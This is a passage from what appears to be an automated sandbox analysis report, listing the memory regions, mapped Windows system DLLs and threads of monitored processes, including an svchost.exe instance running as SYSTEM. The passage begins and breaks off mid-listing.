name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1195 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1196 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1197 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1198 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1199 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1200 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1201 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1202 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1203 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1204 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1205 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1206 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1207 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1208 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1209 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1210 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1211 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1212 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1213 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1214 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1215 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1216 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 73 os_tid = 0xa84 Thread: id = 103 os_tid = 0xb38 Thread: id = 110 os_tid = 0xb78 Thread: id = 117 os_tid = 0xba8 Thread: id = 118 os_tid = 0xbac Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x98f2000" os_pid = "0x374" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x9a4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cf06" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 492 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 493 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 494 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 495 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 496 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 497 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 498 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 499 start_va = 0x150000 end_va = 0x20ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 500 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 501 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 502 start_va = 0x230000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 503 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 504 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 505 start_va = 0x440000 end_va = 0x5c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 506 start_va = 0x5d0000 end_va = 0x750fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 507 start_va = 0x760000 end_va = 0xb52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 508 start_va = 0xb60000 end_va = 0xb60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 509 start_va = 0xb70000 end_va = 0xb70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 510 start_va = 0xb80000 end_va = 0xb80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b80000" filename = "" Region: id = 511 start_va = 0xb90000 end_va = 0xc0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 512 start_va = 0xc10000 end_va = 0xc10fff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 513 start_va = 0xc20000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 514 start_va = 0xca0000 end_va = 0xd1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 515 start_va = 0xd20000 end_va = 0xd21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d20000" filename = "" Region: id = 516 start_va = 0xd30000 end_va = 0xd33fff entry_point = 0xd30000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 517 start_va = 0xd40000 end_va = 0xd41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d40000" filename = "" Region: id = 518 start_va = 0xd50000 end_va = 0xdcffff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 519 start_va = 0xdd0000 end_va = 0xdfffff entry_point = 0xdd0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db") Region: id = 520 start_va = 0xe00000 end_va = 0xe7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 521 start_va = 0xe80000 end_va = 0xe83fff entry_point = 0xe80000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 522 start_va = 0xe90000 end_va = 0xe90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 523 start_va = 0xea0000 end_va = 0xf1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 524 start_va = 0xf20000 end_va = 0x11eefff entry_point = 0xf20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 525 start_va = 0x11f0000 end_va = 0x120bfff entry_point = 0x11f0000 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 526 start_va = 0x1210000 end_va = 0x128ffff entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 527 start_va = 0x1290000 end_va = 0x1290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001290000" filename = "" Region: id = 528 start_va = 0x12d0000 end_va = 0x134ffff entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 529 start_va = 0x1370000 end_va = 0x13effff entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 530 start_va = 0x13f0000 end_va = 0x1455fff entry_point = 0x13f0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 531 start_va = 0x1460000 end_va = 0x14dffff entry_point = 0x0 region_type = private name = "private_0x0000000001460000" filename = "" Region: id = 532 start_va = 0x14e0000 end_va = 0x14effff entry_point = 0x0 region_type = private name = "private_0x00000000014e0000" filename = "" Region: id = 533 start_va = 0x1540000 end_va = 0x15bffff entry_point = 0x0 region_type = private name = "private_0x0000000001540000" filename = "" Region: id = 534 start_va = 0x15c0000 end_va = 0x163ffff entry_point = 0x0 region_type = private name = "private_0x00000000015c0000" filename = "" Region: id = 535 start_va = 0x1680000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x0000000001680000" filename = "" Region: id = 536 start_va = 0x1720000 end_va = 0x179ffff entry_point = 0x0 region_type = private name = "private_0x0000000001720000" filename = "" Region: id = 537 start_va = 0x17a0000 end_va = 0x181ffff entry_point = 0x0 region_type = private name = "private_0x00000000017a0000" filename = "" Region: id = 538 start_va = 0x1870000 end_va = 0x18effff entry_point = 0x0 region_type = private name = "private_0x0000000001870000" filename = "" Region: id = 539 start_va = 0x1990000 end_va = 0x1a0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 540 start_va = 0x1a30000 end_va = 0x1aaffff entry_point = 0x0 region_type = private name = "private_0x0000000001a30000" filename = "" Region: id = 541 start_va = 0x1b10000 end_va = 0x1b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b10000" filename = "" Region: id = 542 start_va = 0x1ba0000 end_va = 0x1c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ba0000" filename = "" Region: id = 543 start_va = 0x1c20000 end_va = 0x1d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c20000" filename = "" Region: id = 544 start_va = 0x1d50000 end_va = 0x1dcffff entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 545 start_va = 0x1e30000 end_va = 0x1eaffff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 546 start_va = 0x1f00000 end_va = 0x1f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 547 start_va = 0x1f80000 end_va = 0x22c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f80000" filename = "" Region: id = 548 start_va = 0x22d0000 end_va = 0x23cffff entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 549 start_va = 0x23f0000 end_va = 0x246ffff entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 550 start_va = 0x24c0000 end_va = 0x253ffff entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 551 start_va = 0x2580000 end_va = 0x25fffff entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 552 start_va = 0x2620000 end_va = 0x269ffff entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 553 start_va = 0x2700000 end_va = 0x277ffff entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 554 start_va = 0x27a0000 end_va = 0x281ffff entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 555 start_va = 0x2820000 end_va = 0x289ffff entry_point = 0x0 region_type = private name = "private_0x0000000002820000" filename = "" Region: id = 556 start_va = 0x2940000 end_va = 0x29bffff entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 557 start_va = 0x2a10000 end_va = 0x2a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a10000" filename = "" Region: id = 558 start_va = 0x2af0000 end_va = 0x2b6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002af0000" filename = "" Region: id = 559 start_va = 0x2b80000 end_va = 0x2b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b80000" filename = "" Region: id = 560 start_va = 0x2b90000 end_va = 0x2c8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b90000" filename = "" Region: id = 561 start_va = 0x2cd0000 end_va = 0x2d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002cd0000" filename = "" Region: id = 562 start_va = 0x2d50000 end_va = 0x2dcffff entry_point = 0x0 region_type = private name = "private_0x0000000002d50000" filename = "" Region: id = 563 start_va = 0x2df0000 end_va = 0x2e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000002df0000" filename = "" Region: id = 564 start_va = 0x2ed0000 end_va = 0x2fcffff entry_point = 0x0 region_type = private name = "private_0x0000000002ed0000" filename = "" Region: id = 565 start_va = 0x2fe0000 end_va = 0x2feffff entry_point = 0x0 region_type = private name = "private_0x0000000002fe0000" filename = "" Region: id = 566 start_va = 0x3050000 end_va = 0x30cffff entry_point = 0x0 region_type = private name = "private_0x0000000003050000" filename = "" Region: id = 567 start_va = 0x30d0000 end_va = 0x31cffff entry_point = 0x0 region_type = private name = "private_0x00000000030d0000" filename = "" Region: id = 568 start_va = 0x3230000 end_va = 0x32affff entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 569 start_va = 0x32c0000 end_va = 0x32cffff entry_point = 0x0 region_type = private name = "private_0x00000000032c0000" filename = "" Region: id = 570 start_va = 0x32f0000 end_va = 0x336ffff entry_point = 0x0 region_type = private name = "private_0x00000000032f0000" filename = "" Region: id = 571 start_va = 0x3390000 end_va = 0x340ffff entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 572 start_va = 0x3410000 end_va = 0x350ffff entry_point = 0x0 region_type = private name = "private_0x0000000003410000" filename = "" Region: id = 573 start_va = 0x3540000 end_va = 0x35bffff entry_point = 0x0 region_type = private name = "private_0x0000000003540000" filename = "" Region: id = 574 start_va = 0x3620000 end_va = 0x369ffff entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 575 start_va = 0x36d0000 end_va = 0x374ffff entry_point = 0x0 region_type = private name = "private_0x00000000036d0000" filename = "" Region: id = 576 start_va = 0x37e0000 end_va = 0x385ffff entry_point = 0x0 region_type = private name = "private_0x00000000037e0000" filename = "" Region: id = 577 start_va = 0x3870000 end_va = 0x38effff entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 578 start_va = 0x3aa0000 end_va = 0x3b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000003aa0000" filename = "" Region: id = 579 start_va = 0x3b20000 end_va = 0x3b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b20000" filename = "" Region: id = 580 start_va = 0x3bd0000 end_va = 0x3c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003bd0000" filename = "" Region: id = 581 start_va = 0x3c90000 end_va = 0x3e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 582 start_va = 0x3ec0000 end_va = 0x3f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 583 start_va = 0x3f70000 end_va = 0x3feffff entry_point = 0x0 region_type = private name = "private_0x0000000003f70000" filename = "" Region: id = 584 start_va = 0x41e0000 end_va = 0x425ffff entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 585 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 586 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 587 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 588 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 589 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 590 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 591 start_va = 0xff1c0000 end_va = 0xff1cafff entry_point = 0xff1c0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 592 start_va = 0x7fef6c80000 end_va = 0x7fef6ceafff entry_point = 0x7fef6c80000 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 593 start_va = 0x7fef6cf0000 end_va = 0x7fef6d09fff entry_point = 0x7fef6cf0000 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 594 start_va = 0x7fef6d10000 end_va = 0x7fef6d8dfff entry_point = 0x7fef6d10000 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 595 start_va = 0x7fef6d90000 end_va = 0x7fef6e13fff entry_point = 0x7fef6d90000 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 596 start_va = 0x7fef6e20000 end_va = 0x7fef6e44fff entry_point = 0x7fef6e20000 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 597 start_va = 0x7fef6e50000 end_va = 0x7fef6e8cfff entry_point = 0x7fef6e50000 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 598 start_va = 0x7fef6e90000 end_va = 0x7fef6ea5fff entry_point = 0x7fef6e90000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 599 start_va = 0x7fef6eb0000 end_va = 0x7fef6f6bfff entry_point = 0x7fef6eb0000 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 600 start_va = 0x7fef6f70000 end_va = 0x7fef6fe2fff entry_point = 0x7fef6f70000 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 601 start_va = 0x7fef6ff0000 end_va = 0x7fef7015fff entry_point = 0x7fef6ff0000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 602 start_va = 0x7fef7020000 end_va = 0x7fef7033fff entry_point = 0x7fef7020000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 603 start_va = 0x7fef7040000 end_va = 0x7fef70aefff entry_point = 0x7fef7040000 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 604 start_va = 0x7fef70b0000 end_va = 0x7fef71defff entry_point = 0x7fef70b0000 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 605 start_va = 0x7fef71e0000 end_va = 0x7fef7226fff entry_point = 0x7fef71e0000 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 606 start_va = 0x7fef7230000 end_va = 0x7fef7271fff entry_point = 0x7fef7230000 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 607 start_va = 0x7fef7280000 end_va = 0x7fef7311fff entry_point = 0x7fef7280000 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 608 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 609 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 610 start_va = 0x7fef7360000 end_va = 0x7fef7441fff entry_point = 0x7fef7360000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 611 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 612 start_va = 0x7fef7520000 end_va = 0x7fef755ffff entry_point = 0x7fef7520000 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 613 start_va = 0x7fef79b0000 end_va = 0x7fef79c6fff entry_point = 0x7fef79b0000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 614 start_va = 0x7fef79d0000 end_va = 0x7fef7b7ffff entry_point = 0x7fef79d0000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 615 start_va = 0x7fef7bb0000 end_va = 0x7fef7bb8fff entry_point = 0x7fef7bb0000 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 616 start_va = 0x7fef8ac0000 end_va = 0x7fef8badfff entry_point = 0x7fef8ac0000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 617 start_va = 0x7fef8f50000 end_va = 0x7fef8f64fff entry_point = 0x7fef8f50000 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 618 start_va = 0x7fefaa20000 end_va = 0x7fefaa96fff entry_point = 0x7fefaa20000 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 619 start_va = 0x7fefab80000 end_va = 0x7fefab89fff entry_point = 0x7fefab80000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 620 start_va = 0x7fefab90000 end_va = 0x7fefaca1fff entry_point = 0x7fefab90000 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 621 start_va = 0x7fefacb0000 end_va = 0x7fefacbefff entry_point = 0x7fefacb0000 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 622 start_va = 